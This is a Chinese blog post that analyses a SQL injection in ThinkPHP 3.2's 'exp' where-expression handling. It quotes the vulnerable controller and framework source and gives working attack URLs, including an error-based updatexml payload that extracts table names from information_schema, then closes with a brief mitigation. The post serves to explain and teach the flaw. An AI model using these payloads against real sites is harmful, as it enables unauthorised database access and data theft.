thinkphp3.2数据库操作分享

最新推荐文章于 2023-11-10 11:39:27 发布
最新推荐文章于 2023-11-10 11:39:27 发布
阅读量511 收藏
点赞数
文章标签: 数据库 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/125668983
版权 
<?php
namespace Home\Controller;
use Think\Controller;
class TestController extends Controller {
    public function index(){
        $username = $_GET['username'];
        $data=M('users')->where(array("username"=>$username))->find();
        dump($data);


    }

    public function login(){
        $this->display();
    }

}

exp表达式
http://www.tp.com/index.php/home/Test/index?username[0]=exp&username[1] ==‘admin’
/thinkphp/library/Think/Db/Driver/Driver.class.php

protected function parseWhereItem($key,$val) {
        $whereStr = '';
        if(is_array($val)) {
            if(is_string($val[0])) {
				$exp	=	strtolower($val[0]);
                if(preg_match('/^(eq|neq|gt|egt|lt|elt)$/',$exp)) { // 比较运算
                    $whereStr .= $key.' '.$this->exp[$exp].' '.$this->parseValue($val[1]);
                }elseif(preg_match('/^(notlike|like)$/',$exp)){// 模糊查找
                    if(is_array($val[1])) {
                        $likeLogic  =   isset($val[2])?strtoupper($val[2]):'OR';
                        if(in_array($likeLogic,array('AND','OR','XOR'))){
                            $like       =   array();
                            foreach ($val[1] as $item){
                                $like[] = $key.' '.$this->exp[$exp].' '.$this->parseValue($item);
                            }
                            $whereStr .= '('.implode(' '.$likeLogic.' ',$like).')';                          
                        }
                    }else{
                        $whereStr .= $key.' '.$this->exp[$exp].' '.$this->parseValue($val[1]);
                    }
                }elseif('bind' == $exp ){ // 使用表达式
                    $whereStr .= $key.' = :'.$val[1];
                }elseif('exp' == $exp ){ // 使用表达式
                    $whereStr .= $key.' '.$val[1];
                }elseif(preg_match('/^(notin|not in|in)$/',$exp)){ // IN 运算
                    if(isset($val[2]) && 'exp'==$val[2]) {
                        $whereStr .= $key.' '.$this->exp[$exp].' '.$val[1];
                    }else{
                        if(is_string($val[1])) {
                             $val[1] =  explode(',',$val[1]);
                        }
                        $zone      =   implode(',',$this->parseValue($val[1]));
                        $whereStr .= $key.' '.$this->exp[$exp].' ('.$zone.')';
                    }
                }elseif(preg_match('/^(notbetween|not between|between)$/',$exp)){ // BETWEEN运算
                    $data = is_string($val[1])? explode(',',$val[1]):$val[1];
                    $whereStr .=  $key.' '.$this->exp[$exp].' '.$this->parseValue($data[0]).' AND '.$this->parseValue($data[1]);
                }else{
                    E(L('_EXPRESS_ERROR_').':'.$val[0]);
                }
            }else {
                $count = count($val);
                $rule  = isset($val[$count-1]) ? (is_array($val[$count-1]) ? strtoupper($val[$count-1][0]) : strtoupper($val[$count-1]) ) : '' ; 
                if(in_array($rule,array('AND','OR','XOR'))) {
                    $count  = $count -1;
                }else{
                    $rule   = 'AND';
                }
                for($i=0;$i<$count;$i++) {
                    $data = is_array($val[$i])?$val[$i][1]:$val[$i];
                    if('exp'==strtolower($val[$i][0])) {
                        $whereStr .= $key.' '.$data.' '.$rule.' ';
                    }else{
                        $whereStr .= $this->parseWhereItem($key,$val[$i]).' '.$rule.' ';
                    }
                }
                $whereStr = '( '.substr($whereStr,0,-4).' )';
            }
        }else {
            //对字符串类型字段采用模糊匹配
            $likeFields   =   $this->config['db_like_fields'];
            if($likeFields && preg_match('/^('.$likeFields.')$/i',$key)) {
                $whereStr .= $key.' LIKE '.$this->parseValue('%'.$val.'%');
            }else {
                $whereStr .= $key.' = '.$this->parseValue($val);
            }
        }
        return $whereStr;
    }

$val为array (
0 => ‘exp’,
1 => ‘=‘admin’’,
)

$exp	=	strtolower($val[0]);//$exp就为exp

elseif('exp' == $exp ){ // 使用表达式
                    $whereStr .= $key.' '.$val[1];}//直接将$key和$val拼接到一块赋值给 $whereStr

最后的sql语句为select * from users where username='admin’直接带到了数据库执行并没有经过任何的过滤如果没有使用exp表达式它会经过parseValue过滤
报错注入
http://www.tp.com/index.php/Home/Test/index/?username[0]=exp&username[1]%20==%27admin%27%20and%20(updatexml(1,concat(0x7e,(select%20(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1)),0x7e),1))###

使用l函数就不会发生此类问题

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP3.2数据库操作总结
爱音乐的Louis的博客
05-24 680
本文只是总结一些常用的方法,更多方法请参考官方文档,下面进入正题 首先,实例化一个对象,本文以下都使用此对象$model $model= M("表名"); //或 $model = D("表名或模型名");//使用模型名时,必须生成一个模型文件 M 是系统模型,D 是自定义模型。 M函数比较适合增删改查操作,D函数适合增删改查和一些其他操作。由于M不需要加载具体的模型类,因此M函数的效...
thinkphp3.2数据库备份下载恢复删除
02-24
thinkphp3.2数据库备份下载恢复删除,在网上也是搜索了大量的信息,才弄出适合自己的数据库管理功能,提取出所需文件,大家学习进步
Thinkphp3.2 关于数据库的基本操作
小明同学
11-22 689
// 数据库字段 连贯操作方法~~!! limit分页 select 查询!! $Model->field('user.name,role.title')->table('think_user'=>'user','think_role'=>'role')->limit(10)->select(); // 数据表别名 alias表别名 $Mod...
ThinkPHP3.2.3连接SQLServer2000
whatnamecaniuse的专栏
03-12 8634
Apache2.2.29 + PHP5.3.29 + ThinkPHP3.2.3 + SQLServer2000
thinkphp3.2.3连接sqlserver 2008 R2 数据库
weixin_34292402的博客
03-24 206
环境: 操作系统——win7 64位旗舰版 PHP——thinkphp 3.23 数据库——Microsoft SQL Server 2008 R2 需要用到的软件: 步骤: 1、搜索SQLSRV30.EXE并下载,解压后将php_pdo_sqlsrv_54_ts.dll、php_sqlsrv_54_ts.dll 这两个文件放到php目录下的ext文件夹下; 2...
thinkphp3.2.3 数据库增删改查
weixin_30794851的博客
02-08 650
版本3.23 1. 多表查找一条数据 M('a表')->join("b表 on b表.id=a表.id")->where('条件')->find(); 2.查找一条数据 M('a表')->where('条件')->find(); 3.多表查询所有数据 M('a表')->join("b表 on b表.id=a表.id")-&...
ThinkPHP3.2框架操作Redis的方法分析
10-17
主要介绍了ThinkPHP3.2框架操作Redis的方法,结合实例形式分析了thinkPHP3.2框架操作Redis数据库的原理及实现方法,需要的朋友可以参考下
ThinkPHP3.2项目源码(包含数据库
11-21
一个使用ThinkPHP3.2的项目实例,供新人学习使用,请勿商用.
thinkphp3.2框架中where条件查询用法总结
10-16
ThinkPHP3.2框架中,`where`条件查询是进行数据库操作时不可或缺的一部分,它允许开发者构建复杂的查询条件来筛选数据。以下是对ThinkPHP3.2中`where`条件查询用法的详细说明: 1. **基本条件查询**: - `EQ`...
ThinkPHP3.1.2 数据库基本操作
最新发布
weixin_46534878的博客
11-10 96
php数据库基本操作
ThinkPHP3.2.3 框架实现安全数据库操作分析
Fly_鹏程万里
12-11 946
0x01 前言 ThinkPHP框架是当前国内最流行的PHP框架之一,虽然TP3.2.3这个版本和国外的开源框架还是有一定距离,但是人家教程多,用户量多,中文文档写得奇的优点,现在工作的公司用的是thinkphp3.2框架进行开发,TP框架为我们开发者提供了底层的安全过滤功能,所以我在使用TP框架开发的时候并没有很仔细的去想过安全的问题,而最近也是挤出了一点时间,想知道TP框架底层是如何运作的,...
thankphp 3.2 mysql链接数据库_ThinkPHP3.2.3 连接数据库的设置
weixin_29476545的博客
02-04 307
ThinkPHP3.2.3 连接数据库的设置,修改模块的配置文件,并设置连接数据库的相关信息。打开项目目录的配置文件Application/Home/Conf/config.php,添加数据库信息代码:returnarray(//'配置项'=>'配置值''DB_TYPE'=>'mysql',//数据库类型'DB_HOST'=>'localhost',//服务器地...
thinkphp 3.2.3 连接sqlserver2008
weixin_34337265的博客
06-23 369
Php 5.3.29版本 windows7环境 1、首先要下载 php_pdo_sqlsrv_53_ts_vc9.dll php_sqlsrv_53_ts_vc9.dll 下载地址:http://share.weiyun.com/dc589fc41567ce6e3fb8b131ec1553ff 这两个文件(如果下载链接失效,各位网友还是把文件名称复制到百度去下载一下,或者加入群交流,群号在文章底部...
thankphp 3.2 mysql链接数据库_thinkphp3.2同时连接两个数据库的简单方法
weixin_42521058的博客
01-30 162
因项目需求,需要用到连接两个库,所以封装了个方法,实例如下:在公共的function.php加入封装的方法function getCrmModel($name){// new的model可以根据自己的需求去更改return new \Home\Model\CrmModel($name);}model代码namespace Home\Model;class CrmModel extends Base...
针对tp3.2数据库基础操作
搬砖工
06-12 210
查询单条数据 $where = array('user_token' => $token); //条件 $str = M('merchant_user')->where($where)->find(); // 根据条件查询出M出的表中单个信息 多表联查(distinct()去除当前字段中重复数据保留一个) $where = array("user_id" => $user_id , "state" => '1'); $data = M('commod...
tinkphp3.2数据库操作一(函数部分)
不忘初心,才能始终
01-25 2761
其实写这篇文章文档API上讲的更详细,但是太分散,所以我把它集中起来,以备后用。 初始化配置 //'配置项'=>'配置值' 'DB_TYPE'=>'mysql', //新版本必须加上这个 'DB_HOST' => '127.0.0.1', 'DB_USER' => 'root', 'DB_PWD' => '123', 'DB_NAME' => 'weibo', '
thinkphp 数据库字段自增自减
海棠酒香丶的博客
10-29 5453
$group->where('id =' . $data['attentionid'])->setInc('enshrine'); $group->where('id =' . $data['attentionid'])->setDec('enshrine');
thinkPHP3.2.3中sql注入漏洞
qq_52988816的博客
05-26 1887
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
tp3.2 基本操作数据库
junerun的博客
09-09 2891
tp3.2 入门操作数据库 $model = M("表名");//或$model = D("表名或模型名");//使用模型名时,必须生成一个模型文件 M 是系统模型,D 是自定义模型。 M函数比较适合增删改查操作,D函数适合增删改查和一些其他操作。由于M不需要加载具体的模型类,因此M函数的效率会比D高一些,推荐使用M。 一、增加 1、添加一条数据: 返回插入的主键值,失败返回false...
thinkphp3.2下载
09-27
ThinkPHP是一款基于PHP的开源Web应用框架,是一个轻量级、高效率的框架,具有模块化、面向对象和MVC设计模式等特点。ThinkPHP 3.2ThinkPHP框架的一个历史版本,它在运行速度、安全性以及开发效率上都有不错的表现。 要下载ThinkPHP 3.2,首先需要打开ThinkPHP的官方网站(www.thinkphp.cn)。在官网主页上,我们可以找到“下载”按钮,点击进入下载页面。 在下载页面上,我们可以找到最新版本的ThinkPHP框架。为了下载ThinkPHP 3.2版本,我们需要向下滚动页面,找到“历史版本下载”或类似的标签,并点击进入历史版本页面。 在历史版本页面上,我们可以看到不同版本的ThinkPHP框架列表。找到并点击“ThinkPHP 3.2”版本,进入该版本的下载页面。 在下载页面上,我们可以选择下载源码或者下载压缩包。如果我们需要自己进行源码修改或者扩展开发,可以选择下载源码。如果我们只是使用框架进行开发而不需要修改源码,可以选择下载压缩包。 选择相应的下载方式后,点击下载按钮即可开始下载。下载完成后,我们可以使用解压软件将压缩包解压缩到我们的项目目录中,然后按照ThinkPHP 3.2的文档进行配置和使用。 总之,要下载ThinkPHP 3.2,我们只需要访问ThinkPHP的官方网站,找到历史版本下载页面,选择相应的下载方式,然后进行下载和安装。通过合理使用ThinkPHP框架,我们可以快速开发出高效、稳定的Web应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值